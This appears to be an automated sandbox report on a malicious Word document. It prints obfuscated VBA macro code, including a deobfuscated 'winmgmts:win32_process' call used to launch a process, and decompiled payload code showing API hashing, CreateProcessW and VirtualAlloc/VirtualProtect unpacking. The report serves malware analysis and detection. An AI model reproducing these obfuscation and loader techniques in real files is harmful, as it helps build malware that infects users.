                                                        lTApi = UBound(hVgaFGj) - 1

                                                        UBound

                                                        334

                                                        cxvFCyK = 0

                                                        335

                                                        Set QDRLrCD = hbrLsIIaJ

                                                        hbrLsIIaJ

                                                        336

                                                        Do Until lTApi > lTApi

                                                        337

                                                        If hVgaFGj(lTApi) = 46 Or lTApi = lTApi Then

                                                        338

                                                        dscc = "sasdsacc" & (cxvFCyK / 2) + 1 & " to " & (lTApi / 2) + 1 & MidB$(hVgaFGj, cxvFCyK + 1, lTApi - cxvFCyK + 3)

                                                        MidB$

                                                        339

                                                        cxvFCyK = lTApi + 2

                                                        340

                                                        Endif

                                                        341

                                                        lTApi = lTApi + 2

                                                        342

                                                        Loop

                                                        343

                                                        Next

                                                        Paragraphs

                                                        343

                                                        nhgrV:

                                                        345

                                                        Goto NelhA

                                                        346

                                                        Set nVwvHB = iyOuxJbS

                                                        iyOuxJbS

                                                        347

                                                        Dim fiGUDJCof, ccUPI, xFjGF as Long

                                                        348

                                                        Dim TIdZDCk as Word.Paragraph

                                                        349

                                                        Dim BMzteJlIE() as Byte

                                                        350

                                                        For Each TIdZDCk in Tvh1u8793dltn9.Paragraphs

                                                        Paragraphs

                                                        351

                                                        BMzteJlIE = TIdZDCk.Range

                                                        Range

                                                        352

                                                        dscc = "sadsaccc" & TIdZDCk.Range

                                                        Range

                                                        353

                                                        ccUPI = UBound(BMzteJlIE) - 1

                                                        UBound

                                                        354

                                                        fiGUDJCof = 0

                                                        355

                                                        Set MSHSTFGF = vcpiDgaED

                                                        vcpiDgaED

                                                        356

                                                        Do Until ccUPI > ccUPI

                                                        357

                                                        If BMzteJlIE(ccUPI) = 46 Or ccUPI = ccUPI Then

                                                        358

                                                        dscc = "sasdsacc" & (fiGUDJCof / 2) + 1 & " to " & (ccUPI / 2) + 1 & MidB$(BMzteJlIE, fiGUDJCof + 1, ccUPI - fiGUDJCof + 3)

                                                        MidB$

                                                        359

                                                        fiGUDJCof = ccUPI + 2

                                                        360

                                                        Endif

                                                        361

                                                        ccUPI = ccUPI + 2

                                                        362

                                                        Loop

                                                        363

                                                        Next

                                                        Paragraphs

                                                        363

                                                        NelhA:

                                                        365

                                                        Goto qjZyxC

                                                        366

                                                        Set fPJtR = TVnICGBMg

                                                        TVnICGBMg

                                                        367

                                                        Dim OGmjSHH, dxYfn, tsgajz as Long

                                                        368

                                                        Dim VwecCsW as Word.Paragraph

                                                        369

                                                        Dim jpCcJn() as Byte

                                                        370

                                                        For Each VwecCsW in Tvh1u8793dltn9.Paragraphs

                                                        Paragraphs

                                                        371

                                                        jpCcJn = VwecCsW.Range

                                                        Range

                                                        372

                                                        dscc = "sadsaccc" & VwecCsW.Range

                                                        Range

                                                        373

                                                        dxYfn = UBound(jpCcJn) - 1

                                                        UBound

                                                        374

                                                        OGmjSHH = 0

                                                        375

                                                        Set ShwUGEG = HoDns

                                                        HoDns

                                                        376

                                                        Do Until dxYfn > dxYfn

                                                        377

                                                        If jpCcJn(dxYfn) = 46 Or dxYfn = dxYfn Then

                                                        378

                                                        dscc = "sasdsacc" & (OGmjSHH / 2) + 1 & " to " & (dxYfn / 2) + 1 & MidB$(jpCcJn, OGmjSHH + 1, dxYfn - OGmjSHH + 3)

                                                        MidB$

                                                        379

                                                        OGmjSHH = dxYfn + 2

                                                        380

                                                        Endif

                                                        381

                                                        dxYfn = dxYfn + 2

                                                        382

                                                        Loop

                                                        383

                                                        Next

                                                        Paragraphs

                                                        383

                                                        qjZyxC:

                                                        385

                                                        Yw0lmj9uz2sfz0 = Replace(Vld8aalp9dc, "x [ sh b", Zi0fdg4qf12t)

                                                        Replace("wx [ sh binx [ sh bmx [ sh bgmx [ sh btx [ sh bx [ sh bx [ sh bx [ sh bsx [ sh bx [ sh bx [ sh b:wx [ sh bx [ sh binx [ sh b3x [ sh b2x [ sh b_x [ sh bx [ sh bpx [ sh bx [ sh brox [ sh bx [ sh bcex [ sh bsx [ sh bsx [ sh bx [ sh b","x [ sh b",) -> winmgmts:win32_process

                                                        Zi0fdg4qf12t

                                                        executed
                                                        386

                                                        Goto CMhXU

                                                        387

                                                        Set yEbqhrSDE = ElQBeG

                                                        ElQBeG

                                                        388

                                                        Dim KGTisCFg, htkDBkB, QbynDCF as Long

                                                        389

                                                        Dim wUyzGJ as Word.Paragraph

                                                        390

                                                        Dim YXZHHCaB() as Byte

                                                        391

                                                        For Each wUyzGJ in Tvh1u8793dltn9.Paragraphs

                                                        Paragraphs

                                                        392

                                                        YXZHHCaB = wUyzGJ.Range

                                                        Range

                                                        393

                                                        dscc = "sadsaccc" & wUyzGJ.Range

                                                        Range

                                                        394

                                                        htkDBkB = UBound(YXZHHCaB) - 1

                                                        UBound

                                                        395

                                                        KGTisCFg = 0

                                                        396

                                                        Set oyFNHnHHI = xhcZSBIH

                                                        xhcZSBIH

                                                        397

                                                        Do Until htkDBkB > htkDBkB

                                                        398

                                                        If YXZHHCaB(htkDBkB) = 46 Or htkDBkB = htkDBkB Then

                                                        399

                                                        dscc = "sasdsacc" & (KGTisCFg / 2) + 1 & " to " & (htkDBkB / 2) + 1 & MidB$(YXZHHCaB, KGTisCFg + 1, htkDBkB - KGTisCFg + 3)

                                                        MidB$

                                                        400

                                                        KGTisCFg = htkDBkB + 2

                                                        401

                                                        Endif

                                                        402

                                                        htkDBkB = htkDBkB + 2

                                                        403

                                                        Loop

                                                        404

                                                        Next

                                                        Paragraphs

                                                        404

                                                        CMhXU:

                                                        406

                                                        Goto BhNEmrIE

                                                        407

                                                        Set PDdhFK = fPExO

                                                        fPExO

                                                        408

                                                        Dim YgziIE, DwikAuvE, fEtRs as Long

                                                        409

                                                        Dim YvQjieFc as Word.Paragraph

                                                        410

                                                        Dim VuThCQHH() as Byte

                                                        411

                                                        For Each YvQjieFc in Tvh1u8793dltn9.Paragraphs

                                                        Paragraphs

                                                        412

                                                        VuThCQHH = YvQjieFc.Range

                                                        Range

                                                        413

                                                        dscc = "sadsaccc" & YvQjieFc.Range

                                                        Range

                                                        414

                                                        DwikAuvE = UBound(VuThCQHH) - 1

                                                        UBound

                                                        415

                                                        YgziIE = 0

                                                        416

                                                        Set WfWmdXBB = obcJwDFA

                                                        obcJwDFA

                                                        417

                                                        Do Until DwikAuvE > DwikAuvE

                                                        418

                                                        If VuThCQHH(DwikAuvE) = 46 Or DwikAuvE = DwikAuvE Then

                                                        419

                                                        dscc = "sasdsacc" & (YgziIE / 2) + 1 & " to " & (DwikAuvE / 2) + 1 & MidB$(VuThCQHH, YgziIE + 1, DwikAuvE - YgziIE + 3)

                                                        MidB$

                                                        420

                                                        YgziIE = DwikAuvE + 2

                                                        421

                                                        Endif

                                                        422

                                                        DwikAuvE = DwikAuvE + 2

                                                        423

                                                        Loop

                                                        424

                                                        Next

                                                        Paragraphs

                                                        424

                                                        BhNEmrIE:

                                                        426

                                                        Goto VcRJFFPFy

                                                        427

                                                        Set dMAig = FVoXJ

                                                        FVoXJ

                                                        428

                                                        Dim wzAgBA, zZJyEAC, YqhWFED as Long

                                                        429

                                                        Dim tVHJH as Word.Paragraph

                                                        430

                                                        Dim DLNPo() as Byte

                                                        431

                                                        For Each tVHJH in Tvh1u8793dltn9.Paragraphs

                                                        Paragraphs

                                                        432

                                                        DLNPo = tVHJH.Range

                                                        Range

                                                        433

                                                        dscc = "sadsaccc" & tVHJH.Range

                                                        Range

                                                        434

                                                        zZJyEAC = UBound(DLNPo) - 1

                                                        UBound

                                                        435

                                                        wzAgBA = 0

                                                        436

                                                        Set swiEYEUA = ZGOfHDFZ

                                                        ZGOfHDFZ

                                                        437

                                                        Do Until zZJyEAC > zZJyEAC

                                                        438

                                                        If DLNPo(zZJyEAC) = 46 Or zZJyEAC = zZJyEAC Then

                                                        439

                                                        dscc = "sasdsacc" & (wzAgBA / 2) + 1 & " to " & (zZJyEAC / 2) + 1 & MidB$(DLNPo, wzAgBA + 1, zZJyEAC - wzAgBA + 3)

                                                        MidB$

                                                        440

                                                        wzAgBA = zZJyEAC + 2

                                                        441

                                                        Endif

                                                        442

                                                        zZJyEAC = zZJyEAC + 2

                                                        443

                                                        Loop

                                                        444

                                                        Next

                                                        Paragraphs

                                                        444

                                                        VcRJFFPFy:

                                                        446

                                                        End Function

                                                        APIsMeta Information

                                                        bHGFAGJ

                                                        Paragraphs

                                                        Range

                                                        Range

                                                        UBound

                                                        OaOIEKmCA

                                                        MidB$

                                                        DHwdFs

                                                        Paragraphs

                                                        Range

                                                        Range

                                                        UBound

                                                        mwvhyA

                                                        MidB$

                                                        Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: JltZHC

                                                        Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Paragraphs

                                                        Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Range

                                                        Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Range

                                                        Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: UBound

                                                        Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: hbrLsIIaJ

                                                        Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: MidB$

                                                        Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: iyOuxJbS

                                                        Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Paragraphs

                                                        Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Range

                                                        Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Range

                                                        Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: UBound

                                                        Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: vcpiDgaED

                                                        Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: MidB$

                                                        Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: TVnICGBMg

                                                        Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Paragraphs

                                                        Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Range

                                                        Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Range

                                                        Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: UBound

                                                        Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: HoDns

                                                        Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: MidB$

                                                        Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Replace

                                                        Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Zi0fdg4qf12t

                                                        Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: ElQBeG

                                                        Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Paragraphs

                                                        Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Range

                                                        Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Range

                                                        Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: UBound

                                                        Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: xhcZSBIH

                                                        Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: MidB$

                                                        Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: fPExO

                                                        Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Paragraphs

                                                        Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Range

                                                        Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Range

                                                        Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: UBound

                                                        Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: obcJwDFA

                                                        Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: MidB$

                                                        Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: FVoXJ

                                                        Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Paragraphs

                                                        Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Range

                                                        Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: Range

                                                        Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: UBound

                                                        Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: ZGOfHDFZ

                                                        Part of subcall function Yw0lmj9uz2sfz0@X1bqz0qaer43b52bf: MidB$

                                                        prgAO

                                                        Paragraphs

                                                        Range

                                                        Range

                                                        UBound

                                                        imnrzOF

                                                        MidB$

                                                        UmQHurWB

                                                        Paragraphs

                                                        Range

                                                        Range

                                                        UBound

                                                        WhmkB

                                                        MidB$

                                                        StringsDecrypted Strings
                                                        "sadsaccc"
                                                        "sasdsacc"
                                                        "sadsaccc"
                                                        "sasdsacc"
                                                        "sasdsacc"
                                                        "sasdsacc"
                                                        "sadsaccc"
                                                        "sasdsacc"
                                                        "sadsaccc"
                                                        "sasdsacc"
                                                        "sasdsacc"
                                                        "sasdsacc"
                                                        "sadsaccc"
                                                        "sasdsacc"
                                                        "sadsaccc"
                                                        "sasdsacc"
                                                        "sasdsacc"
                                                        "sasdsacc"
                                                        "sadsaccc"
                                                        "sasdsacc"
                                                        "sadsaccc"
                                                        "sasdsacc"
                                                        "sasdsacc"
                                                        "sasdsacc"
                                                        LineInstructionMeta Information
                                                        238

                                                        Function K532dwnyk0pybrc(Ev1oy1be511zamut8)

                                                        239

                                                        On Error Resume Next

                                                        executed
                                                        240

                                                        Goto pzxJi

                                                        241

                                                        Set wrpigDnBA = bHGFAGJ

                                                        bHGFAGJ

                                                        242

                                                        Dim fUGOALvdN, FKISJTLG, OpNHJEa as Long

                                                        243

                                                        Dim ZlnBbxF as Word.Paragraph

                                                        244

                                                        Dim pxjzGA() as Byte

                                                        245

                                                        For Each ZlnBbxF in Tvh1u8793dltn9.Paragraphs

                                                        Paragraphs

                                                        246

                                                        pxjzGA = ZlnBbxF.Range

                                                        Range

                                                        247

                                                        dscc = "sadsaccc" & ZlnBbxF.Range

                                                        Range

                                                        248

                                                        FKISJTLG = UBound(pxjzGA) - 1

                                                        UBound

                                                        249

                                                        fUGOALvdN = 0

                                                        250

                                                        Set xNIlBBInl = OaOIEKmCA

                                                        OaOIEKmCA

                                                        251

                                                        Do Until FKISJTLG > FKISJTLG

                                                        252

                                                        If pxjzGA(FKISJTLG) = 46 Or FKISJTLG = FKISJTLG Then

                                                        253

                                                        dscc = "sasdsacc" & (fUGOALvdN / 2) + 1 & " to " & (FKISJTLG / 2) + 1 & MidB$(pxjzGA, fUGOALvdN + 1, FKISJTLG - fUGOALvdN + 3)

                                                        MidB$

                                                        254

                                                        fUGOALvdN = FKISJTLG + 2

                                                        255

                                                        Endif

                                                        256

                                                        FKISJTLG = FKISJTLG + 2

                                                        257

                                                        Loop

                                                        258

                                                        Next

                                                        Paragraphs

                                                        258

                                                        pzxJi:

                                                        260

                                                        Lynlzg8g_wcyt8ojr = Ev1oy1be511zamut8

                                                        261

                                                        Goto QtjyA

                                                        262

                                                        Set phkpFqFCH = DHwdFs

                                                        DHwdFs

                                                        263

                                                        Dim nHiSH, jHDSG, udnviH as Long

                                                        264

                                                        Dim DLwSlnDF as Word.Paragraph

                                                        265

                                                        Dim pXPTCf() as Byte

                                                        266

                                                        For Each DLwSlnDF in Tvh1u8793dltn9.Paragraphs

                                                        Paragraphs

                                                        267

                                                        pXPTCf = DLwSlnDF.Range

                                                        Range

                                                        268

                                                        dscc = "sadsaccc" & DLwSlnDF.Range

                                                        Range

                                                        269

                                                        jHDSG = UBound(pXPTCf) - 1

                                                        UBound

                                                        270

                                                        nHiSH = 0

                                                        271

                                                        Set seTGCvRG = mwvhyA

                                                        mwvhyA

                                                        272

                                                        Do Until jHDSG > jHDSG

                                                        273

                                                        If pXPTCf(jHDSG) = 46 Or jHDSG = jHDSG Then

                                                        274

                                                        dscc = "sasdsacc" & (nHiSH / 2) + 1 & " to " & (jHDSG / 2) + 1 & MidB$(pXPTCf, nHiSH + 1, jHDSG - nHiSH + 3)

                                                        MidB$

                                                        275

                                                        nHiSH = jHDSG + 2

                                                        276

                                                        Endif

                                                        277

                                                        jHDSG = jHDSG + 2

                                                        278

                                                        Loop

                                                        279

                                                        Next

                                                        Paragraphs

                                                        279

                                                        QtjyA:

                                                        281

                                                        E4u6ubi3v5l2 = Yw0lmj9uz2sfz0(Lynlzg8g_wcyt8ojr)

                                                        282

                                                        Goto XxLEEC

                                                        283

                                                        Set ZtgGUHFGJ = prgAO

                                                        prgAO

                                                        284

                                                        Dim TMQhTRa, LZepVwu, JPHDBd as Long

                                                        285

                                                        Dim bkUZDN as Word.Paragraph

                                                        286

                                                        Dim QNtsSHe() as Byte

                                                        287

                                                        For Each bkUZDN in Tvh1u8793dltn9.Paragraphs

                                                        Paragraphs

                                                        288

                                                        QNtsSHe = bkUZDN.Range

                                                        Range

                                                        289

                                                        dscc = "sadsaccc" & bkUZDN.Range

                                                        Range

                                                        290

                                                        LZepVwu = UBound(QNtsSHe) - 1

                                                        UBound

                                                        291

                                                        TMQhTRa = 0

                                                        292

                                                        Set MxAtNhGI = imnrzOF

                                                        imnrzOF

                                                        293

                                                        Do Until LZepVwu > LZepVwu

                                                        294

                                                        If QNtsSHe(LZepVwu) = 46 Or LZepVwu = LZepVwu Then

                                                        295

                                                        dscc = "sasdsacc" & (TMQhTRa / 2) + 1 & " to " & (LZepVwu / 2) + 1 & MidB$(QNtsSHe, TMQhTRa + 1, LZepVwu - TMQhTRa + 3)

                                                        MidB$

                                                        296

                                                        TMQhTRa = LZepVwu + 2

                                                        297

                                                        Endif

                                                        298

                                                        LZepVwu = LZepVwu + 2

                                                        299

                                                        Loop

                                                        300

                                                        Next

                                                        Paragraphs

                                                        300

                                                        XxLEEC:

                                                        302

                                                        K532dwnyk0pybrc = E4u6ubi3v5l2

                                                        303

                                                        Goto SWSoCG

                                                        304

                                                        Set OaVnI = UmQHurWB

                                                        UmQHurWB

                                                        305

                                                        Dim zxEzinCG, EHISACDA, aBRvB as Long

                                                        306

                                                        Dim XdfYSIXX as Word.Paragraph

                                                        307

                                                        Dim wWvlxHJH() as Byte

                                                        308

                                                        For Each XdfYSIXX in Tvh1u8793dltn9.Paragraphs

                                                        Paragraphs

                                                        309

                                                        wWvlxHJH = XdfYSIXX.Range

                                                        Range

                                                        310

                                                        dscc = "sadsaccc" & XdfYSIXX.Range

                                                        Range

                                                        311

                                                        EHISACDA = UBound(wWvlxHJH) - 1

                                                        UBound

                                                        312

                                                        zxEzinCG = 0

                                                        313

                                                        Set wVEbaDF = WhmkB

                                                        WhmkB

                                                        314

                                                        Do Until EHISACDA > EHISACDA

                                                        315

                                                        If wWvlxHJH(EHISACDA) = 46 Or EHISACDA = EHISACDA Then

                                                        316

                                                        dscc = "sasdsacc" & (zxEzinCG / 2) + 1 & " to " & (EHISACDA / 2) + 1 & MidB$(wWvlxHJH, zxEzinCG + 1, EHISACDA - zxEzinCG + 3)

                                                        MidB$

                                                        317

                                                        zxEzinCG = EHISACDA + 2

                                                        318

                                                        Endif

                                                        319

                                                        EHISACDA = EHISACDA + 2

                                                        320

                                                        Loop

                                                        321

                                                        Next

                                                        Paragraphs

                                                        321

                                                        SWSoCG:

                                                        323

                                                        End Function

                                                        Reset < >

                                                          Executed Functions

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2099014935.000007FF00250000.00000040.00000001.sdmp, Offset: 000007FF00250000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_7ff00250000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2b6ef53f7c2ed6aad8202684e1c24fb5ee1ff7ccb86cae8a159fa7eced92b932
                                                          • Instruction ID: ae0067ed974d25b9798f2c7894e5b0f507caf4554b4cd3e18c979ad972e7312d
                                                          • Opcode Fuzzy Hash: 2b6ef53f7c2ed6aad8202684e1c24fb5ee1ff7ccb86cae8a159fa7eced92b932
                                                          • Instruction Fuzzy Hash: E1B1016191EBD24FD7038B7898656A13FB0AF13211B4E41EBC489CF0F3DA5C595AC362
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2099014935.000007FF00250000.00000040.00000001.sdmp, Offset: 000007FF00250000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_7ff00250000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b5507eaac506d6f539ce2da51b70fba6a351c801837d13b4b0d6169e29ce681c
                                                          • Instruction ID: e702179e7b3c3498ed351be6e8e3468ae0339c4f635b5e51f54391f6999c29ff
                                                          • Opcode Fuzzy Hash: b5507eaac506d6f539ce2da51b70fba6a351c801837d13b4b0d6169e29ce681c
                                                          • Instruction Fuzzy Hash: 5A21FD6090E7C24FE7479B388CA56247FB0AF57211B0A44EBC085CF0F3DA6C984AC722
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2099014935.000007FF00250000.00000040.00000001.sdmp, Offset: 000007FF00250000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_7ff00250000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 899996b2aa9d8b591649157c79ee54e6d9b1f28c12bb08143adf7e3419343bb9
                                                          • Instruction ID: 326813aa848ab41b55474dea4daec8328dd1176b299bad43f0468f0b3cf6ace3
                                                          • Opcode Fuzzy Hash: 899996b2aa9d8b591649157c79ee54e6d9b1f28c12bb08143adf7e3419343bb9
                                                          • Instruction Fuzzy Hash: 8DD05E2044DBC94FE702A3386A152D5BFA1FF86244F850697E8CCDA0B3E5180BA8C352
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Execution Graph

                                                          Execution Coverage:5%
                                                          Dynamic/Decrypted Code Coverage:25.3%
                                                          Signature Coverage:1.1%
                                                          Total number of Nodes:91
                                                          Total number of Limit Nodes:4

                                                          Graph

                                                          execution_graph 4748 10009fc7 4749 1000a076 4748->4749 4753 1000a0a1 4748->4753 4754 1000dbb2 4749->4754 4766 1000e0cc 4754->4766 4756 1000e2cc 4778 1001b0d5 4756->4778 4759 1000a089 4759->4753 4767 10013da3 4759->4767 4761 1000b871 GetPEB 4761->4766 4765 1000717b GetPEB 4765->4766 4766->4756 4766->4759 4766->4761 4766->4765 4770 10001b9d 4766->4770 4774 1001ba7b 4766->4774 4788 1000d43e 4766->4788 4791 1001a68f 4766->4791 4795 1001b82f 4766->4795 4799 1000487b 4766->4799 4768 10004010 GetPEB 4767->4768 4769 10013e4a ExitProcess 4768->4769 4769->4753 4771 10001bb0 4770->4771 4803 10004010 4771->4803 4775 1001ba9f 4774->4775 4776 10004010 GetPEB 4775->4776 4777 1001bb33 SHGetFolderPathW 4776->4777 4777->4766 4779 1001b101 4778->4779 4780 1001a68f GetPEB 4779->4780 4781 1001b312 4780->4781 4833 10019c80 4781->4833 4783 1001b352 4787 1001b35d 4783->4787 4837 1000adfc 4783->4837 4786 1000adfc GetPEB 4786->4787 4787->4759 4789 10004010 GetPEB 4788->4789 4790 1000d4f9 4789->4790 4790->4766 4792 1001a6a6 4791->4792 4841 10019fbb 4792->4841 4796 1001b845 4795->4796 4849 10019ef2 4796->4849 4800 100048a0 4799->4800 4853 1000e801 4800->4853 4804 10004076 4803->4804 4805 10001c5f lstrcmpiW 4803->4805 4809 10013c37 4804->4809 4805->4766 4807 10004082 4812 10008203 4807->4812 4816 1000a823 GetPEB 4809->4816 4811 10013cc2 4811->4807 4814 1000821a 4812->4814 4813 100082e8 4813->4805 4814->4813 4817 10003743 4814->4817 4816->4811 4818 1000386b 4817->4818 4825 1000e690 4818->4825 4821 100038b0 4823 100038d8 4821->4823 4824 10008203 GetPEB 4821->4824 4823->4813 4824->4823 4826 1000e6a6 4825->4826 4827 10004010 GetPEB 4826->4827 4828 10003896 4827->4828 4828->4821 4829 100070c5 4828->4829 4830 100070d8 4829->4830 4831 10004010 GetPEB 4830->4831 4832 10007170 4831->4832 4832->4821 4834 10019cc2 4833->4834 4835 10004010 GetPEB 4834->4835 4836 10019d51 CreateProcessW 4835->4836 4836->4783 4838 1000ae0f 4837->4838 4839 10004010 GetPEB 4838->4839 4840 1000ae92 4839->4840 4840->4786 4842 10019fd6 4841->4842 4845 10010f7a 4842->4845 4846 10010f97 4845->4846 4847 10004010 GetPEB 4846->4847 4848 1001102f 4847->4848 4848->4766 4850 10019f16 4849->4850 4851 10004010 GetPEB 4850->4851 4852 10019fac 4851->4852 4852->4766 4854 10004010 GetPEB 4853->4854 4855 100048bf 4854->4855 4855->4766 4856 19fed0 4857 19feed 4856->4857 4862 19f550 4857->4862 4859 19ff7c 4865 19fb30 VirtualAlloc 4859->4865 4861 19ffb3 4863 19f591 4862->4863 4864 19f5c4 VirtualAlloc 4863->4864 4864->4859 4866 19fb8e 4865->4866 4867 19fc15 UnmapViewOfFile VirtualAlloc 4866->4867 4868 19fc50 4867->4868 4869 19fd7d 4868->4869 4870 19fd52 VirtualProtect 4868->4870 4869->4861 4870->4868

                                                          Executed Functions

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 46 10013da3-10013e54 call 10004010 ExitProcess
                                                          C-Code - Quality: 89%
                                                          			E10013DA3() {
                                                          				signed int _v8;
                                                          				signed int _v12;
                                                          				signed int _v16;
                                                          				signed int _v20;
                                                          				signed int _t49;
                                                          
                                                          				_v12 = 0xd5;
                                                          				_v12 = _v12 + 0xee5c;
                                                          				_v12 = _v12 | 0x8aaf0837;
                                                          				_v12 = _v12 << 4;
                                                          				_v12 = _v12 ^ 0xaafeb881;
                                                          				_v20 = 0xab6b;
                                                          				_v20 = _v20 + 0xffffd0c9;
                                                          				_v20 = _v20 + 0x2ddc;
                                                          				_v20 = _v20 ^ 0x00008f38;
                                                          				_v16 = 0x3314;
                                                          				_v16 = _v16 + 0x9923;
                                                          				_v16 = _v16 << 0xa;
                                                          				_v16 = _v16 ^ 0x0330d641;
                                                          				_v8 = 0x7967;
                                                          				_t49 = 0x1f;
                                                          				_push(_t49);
                                                          				_v8 = _v8 / _t49;
                                                          				_push(_t49);
                                                          				_v8 = _v8 * 0x3a;
                                                          				_v8 = _v8 ^ 0xe543aa3f;
                                                          				_v8 = _v8 ^ 0xe5437a66;
                                                          				E10004010(_t49, 0xac2d26d8, 0x135, _t49, 0xed6bd295);
                                                          				ExitProcess(0);
                                                          			}








                                                          0x10013da9
                                                          0x10013db2
                                                          0x10013db9
                                                          0x10013dc0
                                                          0x10013dc4
                                                          0x10013dcb
                                                          0x10013dd2
                                                          0x10013dd9
                                                          0x10013de0
                                                          0x10013de7
                                                          0x10013dee
                                                          0x10013df5
                                                          0x10013df9
                                                          0x10013e00
                                                          0x10013e0c
                                                          0x10013e0f
                                                          0x10013e10
                                                          0x10013e1c
                                                          0x10013e28
                                                          0x10013e2b
                                                          0x10013e32
                                                          0x10013e45
                                                          0x10013e4f

                                                          APIs
                                                          • ExitProcess.KERNEL32(00000000), ref: 10013E4F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2102553232.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000007.00000002.2102568700.0000000010021000.00000040.00000001.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExitProcess
                                                          • String ID: \$fzC$fzC
                                                          • API String ID: 621844428-4050105108
                                                          • Opcode ID: 39e0b3e0242c1929c766ff58a4197b726e5855b5b80b7d8746351de9eb5fb273
                                                          • Instruction ID: 9f2c94031404c76f8a4347eca4ab1513b66c159a7c61353c874c37c29794b4be
                                                          • Opcode Fuzzy Hash: 39e0b3e0242c1929c766ff58a4197b726e5855b5b80b7d8746351de9eb5fb273
                                                          • Instruction Fuzzy Hash: A911F5B1D00308EFEB48DFA5C94A59EBBB0FB04708F208198E415B7291E7B86B45DF40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                          • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0019FB75
                                                          • UnmapViewOfFile.KERNELBASE(?), ref: 0019FC25
                                                          • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0019FC3F
                                                          • VirtualProtect.KERNELBASE(?,?,00000000), ref: 0019FD70
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2101655988.0000000000180000.00000040.00000001.sdmp, Offset: 00180000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_180000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Virtual$Alloc$FileProtectUnmapView
                                                          • String ID:
                                                          • API String ID: 238919573-0
                                                          • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                          • Instruction ID: 4301d48abf177ebe90760239a07af0eb2c69c163b1270af7d412781154210f3b
